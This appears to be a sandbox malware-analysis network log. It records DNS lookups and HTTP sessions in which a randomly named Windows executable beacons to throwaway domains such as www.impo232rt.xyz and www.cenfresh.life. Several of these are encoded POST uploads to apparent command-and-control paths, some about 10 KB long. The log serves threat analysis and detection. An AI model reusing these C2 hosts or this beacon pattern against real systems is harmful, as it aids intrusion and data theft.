Oct 8, 2024 14:18:38.777872086 CEST | 1.1.1.1 | 192.168.2.4 | 0xd16a | No error (0) | www.impo232rt.xyz |  | 176.32.38.141 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:13.004214048 CEST | 1.1.1.1 | 192.168.2.4 | 0xee57 | No error (0) | www.cenfresh.life |  | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:26.306682110 CEST | 1.1.1.1 | 192.168.2.4 | 0x856f | Server failure (2) | www.trafegomagico.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:34.381663084 CEST | 1.1.1.1 | 192.168.2.4 | 0x54a7 | No error (0) | www.digitalbloom.info | digitalbloom.info |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 14:19:34.381663084 CEST | 1.1.1.1 | 192.168.2.4 | 0x54a7 | No error (0) | digitalbloom.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:34.381663084 CEST | 1.1.1.1 | 192.168.2.4 | 0x54a7 | No error (0) | digitalbloom.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:19:48.527544975 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c65 | No error (0) | www.thepeatear.online | thepeatear.online |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 14:19:48.527544975 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c65 | No error (0) | thepeatear.online |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:01.676971912 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b6a | Name error (3) | www.mktimediato.online | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:09.763539076 CEST | 1.1.1.1 | 192.168.2.4 | 0x9749 | Name error (3) | www.schoolsfrirstfcu.org | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:17.835716009 CEST | 1.1.1.1 | 192.168.2.4 | 0x1acd | No error (0) | www.crowsecurity.cloud | crowsecurity.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 14:20:17.835716009 CEST | 1.1.1.1 | 192.168.2.4 | 0x1acd | No error (0) | crowsecurity.cloud |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:17.835716009 CEST | 1.1.1.1 | 192.168.2.4 | 0x1acd | No error (0) | crowsecurity.cloud |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:32.152512074 CEST | 1.1.1.1 | 192.168.2.4 | 0xf003 | No error (0) | www.myjiorooms.services | myjiorooms.services |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 8, 2024 14:20:32.152512074 CEST | 1.1.1.1 | 192.168.2.4 | 0xf003 | No error (0) | myjiorooms.services |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 14:20:32.152512074 CEST | 1.1.1.1 | 192.168.2.4 | 0xf003 | No error (0) | myjiorooms.services |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                                  • www.nad5.shop
                                                                  • www.impo232rt.xyz
                                                                  • www.cenfresh.life
                                                                  • www.digitalbloom.info
                                                                  • www.thepeatear.online
                                                                  • www.crowsecurity.cloud
                                                                  • www.myjiorooms.services
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49752 | 156.226.22.233 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:18:22.795846939 CEST | 438 | OUT | GET /i70z/?Yp=eXMH4fkp&nrs8j=8fwlLwm+T0nphGhW7PHH3xFKB5SB8SFc9+r/t0QDCeclosptBaw61DZvImsaGCeeZR7Fl0K64LM59E0NLQ1vdm4QrRMTpos6Kj6ui5/Q8OeERMbnF/TN1fg= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.nad5.shop
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
Oct 8, 2024 14:18:23.711133003 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Tue, 08 Oct 2024 12:18:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49835 | 176.32.38.141 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:18:38.799689054 CEST | 712 | OUT | POST /azcx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.impo232rt.xyz
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.impo232rt.xyz
                                                                  Referer: http://www.impo232rt.xyz/azcx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 41 70 50 35 6b 63 73 65 6c 7a 2f 74 67 34 43 71 77 31 6e 49 2f 50 64 76 49 64 43 63 2b 73 44 48 6c 4e 65 4b 45 36 4a 34 31 62 48 73 70 62 51 57 72 33 62 4c 56 72 53 55 37 30 42 5a 6b 68 31 35 67 4a 6c 48 37 44 61 4d 51 49 6b 34 77 6b 31 4d 74 4c 6e 42 77 46 46 77 76 74 76 2b 53 35 6b 63 66 32 4c 42 6f 2b 32 41 49 4e 4c 70 2f 58 45 69 4c 71 50 38 54 76 4a 54 4e 73 7a 48 61 62 6d 47 61 6e 6d 37 4d 6d 63 52 31 71 56 69 57 2f 7a 47 4b 4e 5a 76 4a 43 75 70 56 4e 30 46 4a 59 6d 67 34 7a 39 4e 52 48 7a 44 76 46 47 45 6f 4a 6b 7a 56 71 64 69 69 41 3d 3d
                                                                  Data Ascii: nrs8j=vpk4ZW98F8zyApP5kcselz/tg4Cqw1nI/PdvIdCc+sDHlNeKE6J41bHspbQWr3bLVrSU70BZkh15gJlH7DaMQIk4wk1MtLnBwFFwvtv+S5kcf2LBo+2AINLp/XEiLqP8TvJTNszHabmGanm7MmcR1qViW/zGKNZvJCupVN0FJYmg4z9NRHzDvFGEoJkzVqdiiA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49855 | 176.32.38.141 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:18:41.334286928 CEST | 732 | OUT | POST /azcx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.impo232rt.xyz
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.impo232rt.xyz
                                                                  Referer: http://www.impo232rt.xyz/azcx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 43 4a 66 35 68 37 59 65 67 54 2f 75 76 59 43 71 35 56 6e 4d 2f 50 68 76 49 59 37 52 2f 66 72 48 6b 73 75 4b 48 2f 6c 34 30 62 48 73 6d 37 52 63 30 48 62 36 56 71 75 79 37 31 4e 5a 6b 68 78 35 67 4d 4a 48 37 55 47 44 52 59 6b 2b 6c 55 31 4f 70 4c 6e 42 77 46 46 77 76 74 36 5a 53 35 73 63 66 6d 37 42 70 66 33 57 58 39 4c 71 70 48 45 69 50 71 50 77 54 76 4a 78 4e 74 2f 68 61 64 69 47 61 69 4b 37 4e 30 34 53 37 71 55 72 4c 76 79 57 4c 4d 49 58 46 52 44 54 56 76 63 43 4b 72 69 54 39 31 73 58 41 32 53 55 39 46 69 33 31 4f 74 48 59 70 67 72 35 47 70 6a 4c 42 37 71 46 31 30 4b 62 54 5a 6d 39 2b 6e 59 48 64 41 3d
                                                                  Data Ascii: nrs8j=vpk4ZW98F8zyCJf5h7YegT/uvYCq5VnM/PhvIY7R/frHksuKH/l40bHsm7Rc0Hb6Vquy71NZkhx5gMJH7UGDRYk+lU1OpLnBwFFwvt6ZS5scfm7Bpf3WX9LqpHEiPqPwTvJxNt/hadiGaiK7N04S7qUrLvyWLMIXFRDTVvcCKriT91sXA2SU9Fi31OtHYpgr5GpjLB7qF10KbTZm9+nYHdA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49868 | 176.32.38.141 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:18:43.886420012 CEST | 10814 | OUT | POST /azcx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.impo232rt.xyz
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.impo232rt.xyz
                                                                  Referer: http://www.impo232rt.xyz/azcx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 76 70 6b 34 5a 57 39 38 46 38 7a 79 43 4a 66 35 68 37 59 65 67 54 2f 75 76 59 43 71 35 56 6e 4d 2f 50 68 76 49 59 37 52 2f 66 7a 48 6b 61 36 4b 45 63 39 34 6d 4c 48 73 76 62 52 64 30 48 62 64 56 72 47 2b 37 31 52 7a 6b 69 5a 35 68 71 64 48 73 57 75 44 65 59 6b 2b 6e 55 31 4c 74 4c 6e 51 77 46 31 4b 76 74 71 5a 53 35 73 63 66 6b 7a 42 35 2b 33 57 4d 39 4c 70 2f 58 45 2b 4c 71 4f 6c 54 76 42 4c 4e 74 72 58 62 75 71 47 61 47 71 37 42 6d 67 53 33 71 55 70 49 76 7a 54 4c 4d 45 49 46 51 76 75 56 76 45 6b 4b 73 71 54 78 7a 5a 38 64 6c 69 33 76 56 4c 6f 6c 4f 4e 59 41 4b 4d 53 2b 55 5a 49 44 53 58 39 52 6b 49 67 65 44 6f 35 68 73 48 4d 65 72 46 73 4c 46 62 41 58 54 6d 67 6e 69 59 66 41 45 6e 51 75 51 6f 72 52 41 65 42 49 50 53 4d 32 70 36 32 56 2f 75 45 37 76 4d 72 79 39 36 71 57 68 4e 6b 43 64 79 64 58 4f 38 65 31 52 55 58 35 61 79 76 56 6d 6b 4b 79 6d 77 32 34 65 75 53 69 4a 7a 54 49 76 68 64 42 57 64 6f 35 76 61 64 41 51 73 48 58 62 44 4c 7a 41 4b 41 59 6e 68 51 48 64 57 48 4f 38 72 33 [TRUNCATED]
Data Ascii: nrs8j= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49883 | 176.32.38.141 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:18:46.428065062 CEST | 442 | OUT | GET /azcx/?nrs8j=irMYamRxHtj3NMD2tLgxvViSvpLqwhvn7ehZdObCxtX/sdDuQfcDsrOzu60Trx/UY7Wv4F1shT0OqKdZ6j2zU9VfvWpTmK3e9j1Z+5zsY7kVMmPgkcjeH9Y=&Yp=eXMH4fkp HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.impo232rt.xyz
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 50008 | 199.192.21.169 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:19:13.027817011 CEST | 712 | OUT | POST /6iok/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.cenfresh.life
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.cenfresh.life
                                                                  Referer: http://www.cenfresh.life/6iok/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 47 70 55 6f 36 61 31 78 6f 70 32 74 36 55 62 67 62 49 6b 34 48 73 4f 76 2b 69 58 71 42 66 4d 51 53 6c 55 39 50 44 77 58 4b 6f 5a 43 36 5a 39 78 32 59 67 2f 4c 45 68 57 42 35 55 70 4a 78 68 6e 47 4f 44 69 56 51 6c 54 4c 33 30 66 6f 33 62 6d 51 72 63 47 51 43 56 71 62 4d 35 50 44 5a 58 64 6a 53 4f 79 2f 54 74 73 34 69 31 45 44 53 6c 55 34 69 66 69 38 77 36 2f 2b 47 79 4e 39 4b 6f 4f 32 51 78 6c 30 51 53 47 6f 45 77 6f 42 4c 49 56 68 61 76 4e 6b 78 32 75 55 56 5a 41 47 4a 4c 4d 6d 73 71 62 6f 65 74 4d 65 4e 6a 79 30 76 62 67 43 68 55 4a 6e 2f 4c 4f 68 34 49 4e 77 35 70 6f 2b 51 3d 3d
                                                                  Data Ascii: nrs8j=GpUo6a1xop2t6UbgbIk4HsOv+iXqBfMQSlU9PDwXKoZC6Z9x2Yg/LEhWB5UpJxhnGODiVQlTL30fo3bmQrcGQCVqbM5PDZXdjSOy/Tts4i1EDSlU4ifi8w6/+GyN9KoO2Qxl0QSGoEwoBLIVhavNkx2uUVZAGJLMmsqboetMeNjy0vbgChUJn/LOh4INw5po+Q==
Oct 8, 2024 14:19:13.616738081 CEST | 980 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:13 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 50009 | 199.192.21.169 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:19:15.572783947 CEST | 732 | OUT | POST /6iok/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.cenfresh.life
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.cenfresh.life
                                                                  Referer: http://www.cenfresh.life/6iok/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 47 70 55 6f 36 61 31 78 6f 70 32 74 37 30 4c 67 63 76 77 34 57 38 4f 73 78 43 58 71 4f 2f 4d 55 53 6c 51 39 50 44 5a 4b 4e 61 4e 43 39 37 6c 78 31 64 63 2f 59 30 68 57 5a 4a 55 6f 52 52 68 75 47 4f 4f 64 56 56 64 54 4c 33 67 66 6f 32 72 6d 58 63 6f 46 52 53 56 6f 4f 63 35 4a 4f 35 58 64 6a 53 4f 79 2f 54 35 43 34 69 74 45 44 42 39 55 33 6a 66 68 77 51 36 34 35 47 79 4e 35 4b 6f 4b 32 51 77 79 30 55 4c 74 6f 48 59 6f 42 4f 30 56 68 72 76 4f 2f 68 32 6f 4c 46 5a 57 41 4d 75 34 70 4f 4b 56 6e 4d 6c 5a 42 73 44 56 38 4a 4b 36 54 51 31 65 31 2f 76 39 38 2f 42 35 39 36 55 68 6c 56 73 41 71 2b 50 34 62 78 6c 76 66 37 55 48 76 4f 6f 48 47 71 45 3d
                                                                  Data Ascii: nrs8j=GpUo6a1xop2t70Lgcvw4W8OsxCXqO/MUSlQ9PDZKNaNC97lx1dc/Y0hWZJUoRRhuGOOdVVdTL3gfo2rmXcoFRSVoOc5JO5XdjSOy/T5C4itEDB9U3jfhwQ645GyN5KoK2Qwy0ULtoHYoBO0VhrvO/h2oLFZWAMu4pOKVnMlZBsDV8JK6TQ1e1/v98/B596UhlVsAq+P4bxlvf7UHvOoHGqE=
Oct 8, 2024 14:19:16.182003021 CEST | 980 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:16 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 50010 | 199.192.21.169 | 80 | 1228 | C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 14:19:18.120992899 CEST | 10814 | OUT | POST /6iok/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.cenfresh.life
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.cenfresh.life
                                                                  Referer: http://www.cenfresh.life/6iok/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 47 70 55 6f 36 61 31 78 6f 70 32 74 37 30 4c 67 63 76 77 34 57 38 4f 73 78 43 58 71 4f 2f 4d 55 53 6c 51 39 50 44 5a 4b 4e 61 56 43 39 4f 78 78 33 36 49 2f 62 30 68 57 51 70 55 74 52 52 67 2b 47 4f 57 5a 56 56 67 78 4c 31 59 66 36 45 54 6d 57 75 41 46 61 53 56 6f 52 73 35 4d 44 5a 57 41 6a 53 65 2b 2f 54 70 43 34 69 74 45 44 48 35 55 2b 53 66 68 79 51 36 2f 2b 47 79 33 39 4b 6f 79 32 51 34 69 30 55 48 62 72 33 34 6f 43 75 45 56 78 4e 37 4f 7a 68 32 71 4b 46 59 56 41 4d 71 6e 70 4f 6e 71 6e 4e 52 7a 42 73 33 56 35 4f 47 6a 48 69 31 79 68 39 6a 44 74 49 35 52 79 35 68 6e 6d 53 6b 68 36 65 72 77 59 41 5a 46 62 34 34 4e 30 64 77 4e 51 66 72 2b 45 72 6c 74 70 77 46 42 41 43 41 7a 73 4b 43 4c 73 4d 74 66 62 50 79 70 4e 48 31 77 68 6b 48 73 55 62 69 47 39 77 4e 41 59 39 4d 34 54 36 72 4c 47 70 77 46 32 6d 45 36 45 71 42 64 71 2f 71 55 7a 2b 55 4b 43 54 63 54 34 50 71 4e 75 45 44 34 65 53 32 36 69 54 42 51 42 69 32 65 50 68 47 38 67 6c 43 42 50 4b 53 30 6a 42 37 75 6c 6e 4a 30 42 58 62 74 [TRUNCATED]
Data Ascii: nrs8j= [TRUNCATED]
Oct 8, 2024 14:19:18.706728935 CEST | 980 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Tue, 08 Oct 2024 12:19:18 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 774
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 